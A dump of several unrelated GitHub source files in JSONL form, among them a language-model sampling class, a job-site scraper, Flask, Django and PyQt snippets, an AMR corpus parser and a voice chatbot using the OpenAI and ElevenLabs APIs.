tokenized_context[\"input_ids\"].shape[-1] - 1\n last = -1\n encoder_input_ids = None\n input_ids = torch.cat((tokenized_context[\"input_ids\"], tokenized_samples[\"input_ids\"]), 1)\n forward_kwargs = {\n \"input_ids\": input_ids,\n \"attention_mask\": torch.cat((tokenized_context[\"attention_mask\"], tokenized_samples[\"attention_mask\"]), 1)\n }\n labels = forward_kwargs[\"input_ids\"]\n\n return input_ids, encoder_input_ids, forward_kwargs, labels, prompt_length, last\n\n\n def _process_and_warp_logits(self, all_logits, input_ids, encoder_input_ids):\n generation_config = copy.deepcopy(self.network.generation_config)\n generation_config.update(**self.params)\n\n logits_warper = self.network._get_logits_warper(generation_config)\n\n logits_processor = self.network._get_logits_processor(\n generation_config=generation_config,\n input_ids_seq_length=input_ids.shape[-1],\n encoder_input_ids=encoder_input_ids,\n prefix_allowed_tokens_fn=None,\n logits_processor=LogitsProcessorList()\n )\n\n for i in range(all_logits.shape[1]): # [n_samples, length, vocab]\n all_logits[:,i,:] = logits_processor(input_ids[:,:i+1], all_logits[:,i,:])\n all_logits[:,i,:] = logits_warper(input_ids[:,:i+1], all_logits[:,i,:])\n\n return all_logits\n\n def sample(self, context=\"\", sampling_size=32, sum=True):\n \"\"\"Samples sequences from the language model in the given context\n\n Parameters\n ----------\n context: text\n contextual text for which to sample\n sampling_size: int\n number of sequences to sample\n sum: Boolean\n flag to eventually return token-level tensor of scores\n\n Returns\n -------\n tuple of (list of Sample(tokens, text), tensor of logprobs)\n \"\"\"\n if self.network.config.is_encoder_decoder:\n assert context is not None and context != \"\", \"context (encoder input) is mandatory for encoder-decoder models\"\n elif not context:\n context = self.tokenizer.bos_token\n\n input_ids = self.tokenizer([context] * sampling_size, return_tensors=\"pt\", add_special_tokens=True).input_ids.to(self.device)\n n_context_tokens = input_ids.shape[-1]\n\n generate_kwargs = dict(self.params)\n\n # encoder-decoder models have a hard-coded prompt with the context used for the encoder\n # In contrast, decoder-only models use the context as a prompt.\n if self.network.config.is_encoder_decoder:\n prompt_length = 1\n last = None\n torch.tensor([self.tokenizer.bos_token_id] * sampling_size).unsqueeze(-1).to(self.device)\n decoder_input_ids, generate_kwargs = self.network._prepare_decoder_input_ids_for_generation(sampling_size,\n \"decoder_input_ids\",\n generate_kwargs)\n generate_kwargs[\"decoder_input_ids\"] = decoder_input_ids\n else:\n prompt_length = n_context_tokens\n last = None\n\n outputs = self.network.generate(input_ids,\n output_scores=True, return_dict_in_generate=True,\n max_new_tokens=self.length,\n do_sample=True, **generate_kwargs)\n\n all_logprobs = torch.stack(outputs.scores, dim=1).log_softmax(-1) # [sampling_size, length, vocab]\n token_seq_logprobs = torch.gather(\n all_logprobs, 2, outputs.sequences[:, prompt_length:last][:, :, None]\n ).squeeze(-1) # [sampling_size, length]\n\n # we need to zero the (log-)scores of extra \n first_eos_indices = get_token_first_indices(\n outputs.sequences[:, prompt_length:last], # starting at 1 to skip an eventual bos token\n self.tokenizer.eos_token_id\n )\n non_pad_tokens = torch.cat(\n (outputs.sequences[:, prompt_length:last][:, 0].unsqueeze(1),\n torch.where(\n self.tokenizer.pad_token_id == outputs.sequences[:, prompt_length:last][:, 1:],\n -1,\n 
outputs.sequences[:, prompt_length:last][:, 1:])\n ),\n dim=1\n )\n non_pad_log_scores = torch.where(-1 != non_pad_tokens, token_seq_logprobs, torch.tensor(0.).to(self.device))\n for i, ix in enumerate(first_eos_indices):\n non_pad_log_scores[i][0] = token_seq_logprobs[i][0] # at least score one token\n if ix != -1: # if there an eos token\n non_pad_log_scores[i][ix] = token_seq_logprobs[i][ix] # keep the first eos scores\n non_pad_log_scores[i][ix + 1:] = 0. # ignore everything after eos\n\n seq_logprobs = non_pad_log_scores.sum(dim=1) if sum else non_pad_log_scores\n\n output_tokens = outputs.sequences[:, prompt_length:] # [sampling_size, length]\n\n return (\n [TextSample(ots, self.tokenizer.decode(ots)) for ots in output_tokens],\n seq_logprobs\n )\n","repo_name":"naver/disco","sub_path":"disco/distributions/lm_distribution.py","file_name":"lm_distribution.py","file_ext":"py","file_size_in_byte":12688,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"32"} +{"seq_id":"24394868158","text":"\"\"\"\nExercise 2: Write another program that prompts for a list of numbers as above and at the end prints out both the \nmaximum and minimum of the numbers instead of the average.\n\"\"\"\n\nfrom functools import reduce\nfrom typing import List\nfrom ex1 import getArrayOfNum\n\n\n# Functions\ndef analyseNumbers(nums: List[float]): \n results = {}\n\n results['total'] = reduce(lambda sum, currentVal: sum + currentVal, nums, 0)\n results['count'] = len(nums)\n results['max'] = max(nums)\n results['min'] = min(nums)\n results['array'] = nums.copy()\n\n return results;\n\n# CODE\n\nresults = analyseNumbers(getArrayOfNum())\n\nprint(f\"From the array: {results['array']}\\nMax: {results['max']}\\nMin: {results['min']}\")","repo_name":"EliGolam/studying-python","sub_path":"py4e-charles-serverance/chapter5/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9446444186","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nfrom datetime import datetime\nimport pickle\n\nclass AlbamonCrawler :\n def __init__(self) :\n self.base_url = 'https://www.albamon.com/'\n self.detail_source_list = [] #[(url, source)]\n \n def norm_age(self, age) :\n if age == \"무관\" :\n return (None, None)\n l = age.split()[0]\n l = int(l[:l.find('세')])\n r = age.split()[2]\n r = int(r[:r.find('세')])\n return (l, r)\n\n def norm_pay(self, pay) :\n return pay[:-1].replace(',', '')\n\n def norm_worktime(self, worktime) :\n if worktime.startswith('시간협의') : \n return (None, None)\n else :\n (l, r) = (worktime[:5], worktime[6:11])\n l = int(l[:l.find(':')])*60 + int(l[l.find(':')+1:])\n r = int(r[:r.find(':')])*60 + int(r[r.find(':')+1:])\n return (l,r)\n\n def get_info_from_source(self, alba_site_number, source) :\n '''\n source : 주소 url에 request를 날린 text\n return : dict\n {\n 'sex' : str, '남자', '여자', '무관'\n 'age' : tuple(int, int), (낮은 나이, 높은 나이), 없으면(None, None)\n 'address' : str\n 'pay' : int\n 'type_of_pay' : str, '월급', '일급', etc\n 'worktime' : tuple(int, int), (시작 시간의 분, 끝 시간의 분), 없으면(None, None)\n 'alba_site_name' : str\n 'alba_site_number' : str\n }\n '''\n soup = BeautifulSoup(source, 'html.parser')\n condition_selector = '#allcontent > div.viewContent.viewRecruitType > div.viewTypeFullWidth > div.conditionInfo.verticalLine > div.column.column_620.infoBox > div.recruitCondition > div > table > tbody'\n info = {}\n for tr_tag in 
soup.select(condition_selector)[0].find_all(\"tr\") :\n if tr_tag.find(\"th\").text == \"성별\" :\n info['sex'] = tr_tag.find(\"span\").text\n if tr_tag.find(\"th\").text == \"연령\" :\n info['age'] = self.norm_age(tr_tag.find(\"span\").text)\n info['address']= soup.select(\n f'div.viewContent.viewRecruitType > div.viweTab > div.tabItem_workArea > div.workAddr > span')[0].text\n info['pay']= self.norm_pay(soup.select(\n f'div.workCondition > div.viewTable > table > tbody > tr:nth-child(1) > td > div.payInfoBox > span.monthPay')[0].text)\n info['type_of_pay']= soup.select(\n f'div.workCondition > div.viewTable > table > tbody > tr:nth-child(1) > td > div.payInfoBox > span.textPoint > strong')[0].text\n info['worktime']= self.norm_worktime(soup.select(\n f'div.workCondition > div.viewTable > table > tbody > tr:nth-child(4) > td > span')[0].text.strip())\n info['alba_site_name'] = 'albamon'\n info['alba_site_number'] = alba_site_number\n return info\n \n def crawl_from_site(self) :\n PAGE_NUM = 1\n SLEEP_TIME = 5.0\n\n #PAGE_NUM만큼 URL 리스트를 뽑는다.\n #알바몬은 한 페이지 당 20개\n detail_url_list = []\n for page in range(1, 1+PAGE_NUM) :\n time.sleep(SLEEP_TIME)\n source = requests.get(self.base_url + f'/list/gi/mon_gi_tot_list.asp?page={page}').text\n soup = BeautifulSoup(source, 'html.parser')\n \n for i in range(5) :\n #for i in range(20) :\n detail_url_list.append(soup.select(f'td.subject > div.subWrap > p.cName > a')[i]['href'])\n\n #URL 리스트들에서 소스를 얻어낸다\n for i in detail_url_list :\n self.detail_source_list.append((i, requests.get(self.base_url + i).text))\n time.sleep(SLEEP_TIME)\n \n #소스들을 피클로 저장\n save_pkl_file_name = 'albamon_source_' + str(datetime.now().isoformat(sep='_')).replace(':','-') +'.pkl'\n with open(save_pkl_file_name, 'wb') as f:\n pickle.dump(self.detail_source_list, f)\n \n def get_alba_site_number_form_url(self, url) :\n end_pos = url.find('&mj_stat')\n return url[26:end_pos]\n \n def get_info_list(self) :\n # open_pkl_file_name = 'C:\\\\Users\\\\Green\\\\Desktop\\\\2020_hongik_project\\\\app\\\\midterm_alba\\\\crawler\\\\albamon_source_2020-05-21_14-09-07.593744.pkl'\n # with open(open_pkl_file_name, 'rb') as f:\n # self.detail_source_list = pickle.load(f)\n self.crawl_from_site()\n result = []\n for i in self.detail_source_list :\n result.append(self.get_info_from_source(self.get_alba_site_number_form_url(i[0]), i[1]))\n return result\n","repo_name":"green5555/2020-hongik-project","sub_path":"app/crawler/bot/albamon.py","file_name":"albamon.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6596477873","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom .models import Room\nfrom django import forms\n\ndef index(request):\n print()\n room = Room.objects.all()\n print(room)\n print()\n return render(request, \"room/room.html\", context={\"room\": room})\n\ndef personal_room (request, slug):\n room = Room.objects.get(slug=slug)\n print()\n print('personal room')\n print()\n return render(request, 'room/personal_room.html', context={'room': room})\n","repo_name":"Aniri2013/HomeWork25","sub_path":"gurt/room/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5228357409","text":"####\n# Concept : A concept is the value of an AMR node after the variable has been removed\n# Concept cleaning : Includes removal of 
quotation marks and stripping out number tags\n\nimport re\nfrom Node_class import node, parse_amr;\nfrom AlignmentEvaluator_class import AlignmentEvaluator\n\nclass AMR:\n\n\tdef __init__(self):\n\t\tself.ID = '';\n\t\tself.date = '';\n\t\tself.annotator = '';\n\t\tself.sentence = '';\n\t\tself.save_date = '';\n\t\tself.file = '';\n\t\tself.tokens = [];\n\t\tself.alignments = '';\n\t\tself.alignment_annotator = '';\n\t\tself.alignment_date = '';\n\t\tself.NumberOfConcepts = 0;\n\t\tself.AMR_string_printable = '';\t\t\t#AMR string prints just like in the original file\n\t\tself.AMR_aligned_string_printable = '';\t#AMR string annotated with alignment information prints in tree format\n\t\tself.AMR_string_parsable = '';\t\t\t#Linearized AMR string\n\t\tself.AMR_tree = None;\t\n\t\tself.AMR_tree_aligned = None;\t\t\t#AMR tree annotated with alignment information\n\t\tself.AMR_dict = {};\t\t\t\t\t\t#facilitates AMR string and tree lookup by ID\n\t\tself.Evaluator = AlignmentEvaluator();\n\t\t\n\t#\tMethods :\n\n\t#\tread(self,s)\n\t#\tevaluate_alignments\n\t#\tprint_alignments\n\t#\tgenerate_printable_AMR\n\t#\tgenerate_writable\n\t#\tprintAMR\n\t#\tgetNodeByAddress\n\t#\tannotate_node\n\t#\tconvertISItoJAMR\n\t#\tgetConcepts\n\t#\tgetTokens\n\t#\tgetAlignments\n\t#\tgetAMRTree\n\t#\tgetAMRStringByID\n\t#\tgetAMRTreeByID\n\t#\tsetAlignments\n\t\n\tdef read(self,s):\n\t#reads a string that describes the AMR and parses the string into components\n\t\ts = s.split('\\n');\n\t\t#Read AMR literal\n\t\tif s[3][0] == '#':\t\t#indicates that there is an alignment line\n\t\t\talignment_line = (s[3]).split();\n\t\t\tself.alignments = alignment_line[2:-5];\t#remove the ::alignment tag\n\t\t\tAMR_lines = s[4:];\n\t\telse: AMR_lines = s[3:];\n\t\tself.AMR_string_printable='\\n'.join(AMR_lines);\n\t\tself.AMR_aligned_string_printable=self.AMR_string_printable;\n\t\t\n\t\tAMR_lines = map(lambda s: s.lstrip(),AMR_lines);\t\n\t\tself.AMR_string_parsable=' '.join(AMR_lines);\n\t\n\t\tID_line = s[0];\n\t\tID_line = ID_line.split();\n\t\tfor i in range(0,len(ID_line)):\n\t\t\tprev_token=ID_line[i-1];\n\t\t\tif(prev_token == '::id'):\n\t\t\t\tself.ID = ID_line[i];\n\t\t\tif(prev_token == '::date'):\n\t\t\t\tself.date = ID_line[i];\n\t\t\tif(prev_token == '::annotator'):\n\t\t\t\tself.annotator = ID_line[i];\n\t\tself.AMR_tree = parse_amr(self.AMR_string_parsable);\t\t\n\t\tself.AMR_tree_aligned = self.AMR_tree;\n\t\tself.AMR_dict[self.ID] = [self.AMR_string_printable, self.AMR_tree];\t#Ideally, we should be able to generate the printable string from the tree. \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#Then we wouldn't have to save the printable string at all.\n\n\t\tself.NumberOfConcepts = len(self.getConcepts(0));\n\t\tsnt_line = s[1];\t\n\t\tself.sentence = snt_line[8:];\n\n\t#\ttok_line = s[3];\n\t#\tself.tokens = (tok_line[8:]).split();\n\t#\t#print self.tokens;\t\n\n\t#\tfor i in range(0,len(alignment_line)):\t#not sure what this is for, probably some border case\n\t#\t\tif alignment_line[i] == ':':\n\t#\t\t\tbreak;\n\t#\talignment_line = alignment_line[:i-1];\t\n\t#\ttemp_split = alignment_line.split();\t\n\t#\talignments = '';\n\t#\tfor item in temp_split[:-5]:\t\t\t#remove the last 5 tokens after splitting. 
These are other metadata.\n\t#\t\talignments = alignments + \" \" + item;\n\t#\talignments = alignments[1:];\n\n\t\treturn;\n\t\n\tdef evaluate_alignments(self, true_alignments):\n\t\n\t\tself.Evaluator.read(self.alignments, true_alignments, 0, self.AMR_tree);\n\t\tself.Evaluator.evaluate();\n\t\treturn self.Evaluator.getStatistics();\n\n\tdef print_alignments(self):\n\t\t\n\t\tself.Evaluator.print_alignments();\n\n\tdef generate_printable_AMR(self):\n\n\t\tself.AMR_aligned_string_printable = self.AMR_tree_aligned.generatePrintableAMR('','\\t');\n\t\t\n\t'''\n\t Generates the AMR in corpus format. If annotation_flag is set, checks if alignment string is null,\n\t if not, adds alignments to the nodes. \n\t'''\n\tdef generate_writable(self, annotation_flag):\n\t\n\t\ts = '';\n\t\ts = s + \"# ::id \" + self.ID + '\\n';\n\t\ttokens = self.sentence.split();\n\t\tsentencewithnum = '';\n\t\tfor i in range(0,len(tokens)):\n\t\t\tsentencewithnum += (tokens[i]+'-'+str(i)+' ');\n\t\ts = s + \"# ::snt \" + sentencewithnum[:-1] + '\\n';\n\t\ts = s + \"# ::save-date\\n\";\n\t\t#s = s + \"# ::tok\";\n\t\t#for i in range(0,len(self.tokens)):\n\t\t#\ts = s + ' ' + str(i) + '-' + self.tokens[i];\n\t\t#s = s + '\\n';\n\t\ts = s + '# ::alignments ' + ' '.join(self.alignments) + ' * * * * *\\n';\n\t\tif annotation_flag and len(self.alignments) != 0:\n\t\t\tfor alignment in self.alignments:\n\t\t\t\talignment = alignment.split('|');\n\t\t\t\taddress = alignment[1];\n\t\t\t\ttoknum = alignment[0].split('-');\n\t\t\t\ttoknum = toknum[0];\n\t\t\t\tself.annotate_node(address, toknum);\t\n\t\t\tself.AMR_aligned_string_printable = self.AMR_tree_aligned.generatePrintableAMR('','\\t',False);\n\t\ts = s + self.AMR_aligned_string_printable;\n\t\ts = s + '\\n';\n\t\t\n\t\treturn s;\n\n\tdef printAMR(self):\n\t\t\n\t\tself.AMR_tree.printSubtree('1');\n\t\treturn;\n\n\tdef getNodeByAddress(self,address,jamr_addr):\n \n\t\trole = 0;\n\t\tif address[-1] == 'r':\n\t\t\taddress = address[:-2]; \n\t\t\trole = 1;\n\t\tif address == '1':\n\t\t\treturn (self.AMR_tree).getValue();\n\t\treturn (self.AMR_tree).getNode(address[2:],role,jamr_addr);\n\n\tdef getSubtreeAddress(self, address):\n\t\n\t\ti = address.find('.'); \n\t\t\n\t\tif i == -1: \n\t\t\treturn int(address)-1, address;\n\t\t\n\t\tchildnum = int(address[0:i])-1;\n\t\treturn childnum, address[i+1:];\n\n\t'''\n\t Find the AMR node using given address and annotates the concept with given\n\t token number.\n\t'''\n\tdef annotate_node(self, address, token_number):\n\n\t\t#If my getNode and getNodeByAddress functions were designed better, I wouldn't have to access the tree directly. \n\t\t#Right now, those functions return the value at node. 
Instead, they should simply return the node itself.\n\t\t#Now there's too many strings attached to those functions and I'm afraid I'll mess something up.\n\t\tif (address == '1'): node = self.AMR_tree_aligned;\n\t\telse: \n\t\t\tc, addr = self.getSubtreeAddress(address);\n\t\t\tnode = self.AMR_tree_aligned.getNodePointer(addr, 0, 1);\t\n\n\t\tv = node.getValue();\n\t\ti = v.find('/');\n\t\n\t\tif i == -1 or v[0] == '\"':\t#leaf node\n\t\t\tnewval = v+\"~\"+str(token_number);\n\t\telse:\n\t\t\tv = v.split();\t#v[0] is the variable, v[1] is the '/' character and v[2] is the concept name\n\t\t\tnewval = v[0]+\"~\"+str(token_number) + \" / \" + v[2];\n\n\t\tnode.setValue(newval);\n\n\tdef convertISItoJAMR(self,address):\n\t\t\n\t\tif address == '1': return '1';\n\t\treturn (self.AMR_tree).ISItoJAMR(address[2:],'1');\n\t\n\tdef cleanConcept(self, concept):\n\t#Takes a concept as input and returns the cleaned version\n\t\t#print \"__\"+concept+\"__\";\t\n\t\tif len(concept) > 1 and concept[0] == '\"': concept = concept[1:-1]; #Remove quotation marks\n\t\tconcept = re.sub('\\-[0-9]+$','',concept); #Remove number tags\n\t\n\t\treturn concept;\n\t\n\tdef getConcepts(self, clean):\n\t#clean == 1 means the concepts should be cleaned. \n\t#Returns a list of tuples of the form (concept, address).\n\n\t\tclist = self.AMR_tree.getConcepts('1');\n\t\tif clean: \n\t\t\tcleanclist = [(self.cleanConcept(x[0]),x[1]) for x in clist];\n\t\t\tclist = cleanclist;\n\t\treturn clist;\n\t\n\tdef linearize(self):\t\n\n\t\tlinearAMR = self.AMR_tree.linearize('1');\n\t\treturn linearAMR;\n\t\t\n\tdef getTokens(self):\n\t\t\n\t\treturn (self.sentence).split();\t\n\t\n\tdef getAlignments(self):\n\t\t\n\t\treturn self.alignments;\n\t\n\tdef getAMRTree(self):\n\t\t\n\t\treturn self.AMR_tree;\n\n\tdef getAMRStringByID(self,ID):\n\t\t\n\t\treturn self.AMR_dict[ID][0];\n\t\n\tdef getAMRTreeByID(self,ID):\n\t\t\n\t\treturn self.AMR_dict[ID][1];\n\n\tdef setAlignments(self,alignments):\n\t\t\n\t\tself.alignments = alignments;\n\n#Reads a corpus file and returns a list of AMR objects\t\ndef read_corpus_file(fname):\n\n\tamr_objects = [];\t\n\t\n\tf=open(fname);\n\ts=f.read();\n\tf.close();\n\t\n\ts = s.split('\\n\\n');\t\n\tdel s[0];\n\tdel s[-1];\n\t\n\tfor amr_desc in s:\n\t\ta = AMR();\n\t\ta.read(amr_desc);\n\t\t#print a.ID;\n\t\tamr_objects.append(a);\n\t\t\n\treturn amr_objects;\n","repo_name":"pgoel92/AMR-One","sub_path":"lib/AMR_class.py","file_name":"AMR_class.py","file_ext":"py","file_size_in_byte":7680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10014397255","text":"\"\"\"\nReturn function boundary_name(x) that returns True if x is within the boundary and False otherwise.\n\"\"\"\nimport numpy as np\n\nimport triangle_intersection as ti\nimport bga_4_0 as bga\nimport statistics as sts\n\ndef get_boundary(boundary_name, kwargs={}, binary=False):\n if boundary_name == None:\n if binary == True:\n return lambda x, y: True\n else:\n return lambda x: True\n return globals()[boundary_name](**kwargs)\n try:\n return globals()[boundary_name](**kwargs)\n except (KeyError, NameError):\n raise Exception(\"ERROR: \" + boundary_name + \" not found.\")\n \n###--------------------------------------------------------------------------\ndef positive_boundary():\n return lambda x: min(x) >= 0.0\n\n####--------------------------------------------------------------------------\n#def none():\n# return lambda x: 
True\n\n###--------------------------------------------------------------------------\ndef self_intersection(poly_name=None, int_num=None):\n \"\"\"\n For building game intermediates, test for intersection of triangles.\n \"\"\"\n try:\n q0, links, lengths, faces = bga.load_bg_int(poly_name, int_num)\n return lambda x: self_intersection_fun(x, faces)\n except (ValueError, IndexError):\n raise Exception(\"ERROR: Building game intermediate \" + str(int_num) + \n \" for \" + polyname + \" not found.\")\n\ndef adjacent_faces(j, k, faces):\n return len(set(faces[j]).intersection(set(faces[k]))) == 2\n \ndef self_intersection_fun(x, faces):\n F = len(faces)\n for j in range(F):\n for k in range(j+1, F):\n if adjacent_faces(j, k, faces) == True:\n continue\n if ti.triangle_intersection(ti.get_face(x, faces[j]), \n ti.get_face(x, faces[k]), \n scaling=0.99) == True:\n return False\n return True\n###--------------------------------------------------------------------------\ndef dihedrals(poly_name=None, int_num=None):\n \"\"\"\n For building game intermediates, test for dihedral angle sign switches.\n \"\"\"\n try:\n q0, links, lengths, faces = bga.load_bg_int(poly_name, int_num)\n except (ValueError, IndexError):\n raise Exception(\"ERROR: Building game intermediate \" + str(int_num) + \n \" for \" + polyname + \" not found.\")\n \n dihedral_inds = []\n F = len(faces)\n for j in range(F):\n for k in range(j+1, F):\n if adjacent_faces(j, k, faces) == True:\n dihedral_inds.append(order_verts(faces[j], faces[k]))\n \n return lambda x, y: dihedrals_fun(x, y, dihedral_inds=dihedral_inds)\n\n\ndef dihedrals_fun(x, y, dihedral_inds=None):\n \"\"\"\n Compare the dihedrals of x and y and check for sign change. \n \"\"\"\n x_dihedrals = get_dihedrals(x, dihedral_inds)\n y_dihedrals = get_dihedrals(y, dihedral_inds)\n\n if max(abs(x_dihedrals - y_dihedrals)) > 2.0:\n return False\n else:\n return True\n\ndef get_dihedrals(y, dihedral_inds=None):\n \"\"\"\n Compure the dihedral angles at y.\n \"\"\"\n dihedrals = np.zeros(len(dihedral_inds))\n for k, di in enumerate(dihedral_inds):\n dihedrals[k] = sts.signed_dihedral_angle(y, di[0], di[1], di[2], di[3])\n return dihedrals\n\ndef order_verts(v1, v2):\n \"\"\"\n get order of vert inds for dihedral calculation.\n \"\"\"\n common_verts = set(v1).intersection(set(v2))\n ordered_verts = [list(set(v1).difference(common_verts))[0],\n list(common_verts)[0],\n list(common_verts)[1],\n list(set(v2).difference(common_verts))[0]]\n return ordered_verts\n###--------------------------------------------------------------------------\n","repo_name":"Danie1Johnson/research","sub_path":"boundaries.py","file_name":"boundaries.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41111566677","text":"import Model.Import_to_file as Import_to_file\nimport Model.Notes as Notes\nimport Controller.Menu as Menu\n\nnumber = 6 # сколько знаков МИНИМУМ может быть в тексте заметки\n\n# данный метод добавляет заметку в файл\ndef add():\n note = Menu.create_note(number)\n note_in_file = Import_to_file.read_file()\n for notes in note_in_file:\n if Notes.Notes.get_id(note) == Notes.Notes.get_id(notes):\n Notes.Notes.set_id(note)\n note_in_file.append(note)\n Import_to_file.write_file(note_in_file, 'a')\n print('Заметка добавлена...')\n\n# данный метод показывает определенную информацию в зависимости от выбора пользователя\ndef show(text):\n logic = True\n note_in_file = 
Import_to_file.read_file()\n # выборка заметок по дате\n if text == 'date':\n date = input('Введите дату в формате dd.mm.yyyy: ')\n # вывод всех заметок\n for notes in note_in_file:\n if text == 'all':\n logic = False\n print(Notes.Notes.map_note(notes))\n # вывод заметок по ID\n if text == 'id':\n logic = False\n print('ID: ' + Notes.Notes.get_id(notes))\n # сортировка заметок по дате\n if text == 'date':\n logic = False\n if date in Notes.Notes.get_date(notes):\n print(Notes.Notes.map_note(notes))\n if logic == True:\n print('Нет ни одной заметки...')\n\n#данный метод удаляет заметку либо же изменяет её в зависимости от того что ввел пользователь\ndef id_edit_del_show(text):\n id = input('Введите id заметки: ')\n note_in_file = Import_to_file.read_file()\n logic = True\n for notes in note_in_file:\n if id == Notes.Notes.get_id(notes):\n logic = False\n # изменение заметки\n if text == 'edit':\n note = Menu.create_note(number)\n Notes.Notes.set_title(notes, note.get_title())\n Notes.Notes.set_body(notes, note.get_body())\n Notes.Notes.set_date(notes)\n print('Заметка изменена...')\n # удаление заметки\n if text == 'del':\n note_in_file.remove(notes)\n print('Заметка удалена...')\n # вывод всех заметок\n if text == 'show':\n print(Notes.Notes.map_note(notes))\n if logic == True:\n print('Такой заметки нет, возможно, вы ввели неверный id')\n Import_to_file.write_file(note_in_file, 'a')","repo_name":"Dina7919/SeminarsPython","sub_path":"Control_task_python_1/Model/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72046429530","text":"import sqlite3\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n\ndef create_cursor():\n connection = sqlite3.connect('chinook.db')\n return connection\n\n\n@app.route('/names')\ndef get_names():\n with create_cursor() as cursor:\n query = cursor.execute('SELECT DISTINCT (FirstName) FROM customers')\n data = query.fetchall()\n\n return jsonify(unique_names=str(len(data)))\n\n\n@app.route('/customers/')\ndef get_customers():\n with create_cursor() as cursor:\n\n conditions = []\n\n try:\n customer_id = int(request.args['id']) # id\n conditions.append(f'CustomerId = {customer_id}')\n except (ValueError, KeyError): # id = not int\n pass\n\n country = request.args.getlist('country') # country\n if country:\n n = \", \".join(repr(e) for e in country)\n conditions.append(f'Country IN ({n})')\n\n fax_parameters = {\n 'is_null': 'Fax IS NULL',\n 'is_not_null': 'Fax IS NOT NULL',\n }\n fax = fax_parameters.get(request.args.get('fax')) # fax\n if fax: # if fax is true\n conditions.append(fax)\n\n # request\n if conditions: # if conditions is not empty\n where = ' OR '.join(conditions) # OR\n query = f'SELECT * FROM customers WHERE {where}'\n else:\n query = 'SELECT * FROM customers'\n\n customers = cursor.execute(query)\n\n results = customers.fetchall()\n # print(conditions)\n return jsonify(results)\n\n\n@app.route('/tracks')\ndef gef_tracks():\n with create_cursor() as cursor:\n query = cursor.execute('SELECT Count(*) FROM tracks')\n data = query.fetchall()\n\n return jsonify(data)\n\n\n@app.route('/tracks-sec')\ndef gef_tracks_sec():\n with create_cursor() as cursor:\n query = cursor.execute('SELECT Name, Milliseconds/1000 FROM tracks')\n data = query.fetchall()\n\n return jsonify(data)\n\n\nif __name__ == '__main__':\n 
app.run()\n","repo_name":"avtodorov/DZ3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37377230582","text":"from PyQt6 import QtWidgets, QtCore # 將 PyQt6 換成 PyQt5 就能改用 PyQt5\nimport sys\n\nclass MyWidget(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle('oxxo.studio')\n self.resize(300, 200)\n self.ui()\n\n def ui(self):\n self.slider = QtWidgets.QSlider(self) # 加入數值調整滑桿\n self.slider.move(20,20)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n Form = MyWidget()\n Form.show()\n sys.exit(app.exec())\n\n","repo_name":"oxxostudio/book-code","sub_path":"pyqt/ch06/code12_class.py","file_name":"code12_class.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"72445032092","text":"import os\nimport openai\nimport requests\nimport io\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nfrom decouple import config\nimport speech_recognition as sr\n\nopenai.api_key = config('OPENAI_API_KEY')\nELEVEN_LABS_API_KEY = config('ELEVEN_LABS_API_KEY')\nELEVEN_LABS_API_URL = \"https://api.elevenlabs.io/v1/text-to-speech/piTKgcLEGmPE4e6mEKli/stream\"\n\ndef text_to_speech(text):\n headers = {\n \"Accept\": \"audio/mpeg\",\n \"Content-Type\": \"application/json\",\n \"xi-api-key\": ELEVEN_LABS_API_KEY\n }\n data = {\n \"text\": text,\n \"model_id\": \"eleven_monolingual_v1\",\n \"voice_settings\": {\n \"stability\": 0.5,\n \"similarity_boost\": 0.5\n }\n }\n response = requests.post(ELEVEN_LABS_API_URL, json=data, headers=headers, stream=True)\n\n if response.status_code == 200:\n return response.content\n else:\n return None\n\ndef chat_with_gpt(prompt):\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an AI assistant, answer questions under 20 words.\"},\n {\"role\": \"user\", \"content\": prompt}\n ]\n )\n return completion.choices[0].message[\"content\"]\n\nrecognizer = sr.Recognizer()\nprint(\"AI: Hello! I'm here to help. You can start the conversation. Say 'exit' to end.\")\n\nwhile True:\n with sr.Microphone() as source:\n audio = recognizer.listen(source, timeout=3, phrase_time_limit=3)\n\n try:\n user_input = recognizer.recognize_google(audio)\n print(\"You:\", user_input)\n\n if user_input.lower() == \"exit\":\n print(\"AI: Goodbye!\")\n break\n\n gpt_response = chat_with_gpt(user_input)\n print(\"AI:\", gpt_response)\n\n gpt_audio = text_to_speech(gpt_response)\n\n if gpt_audio is not None:\n audio = AudioSegment.from_file(io.BytesIO(gpt_audio), format=\"mp3\")\n play(audio)\n except sr.WaitTimeoutError:\n print(\"AI: I'm waiting for your question. Please speak within 3 seconds.\")\n except sr.UnknownValueError:\n print(\"AI: Sorry, I couldn't understand your speech. 
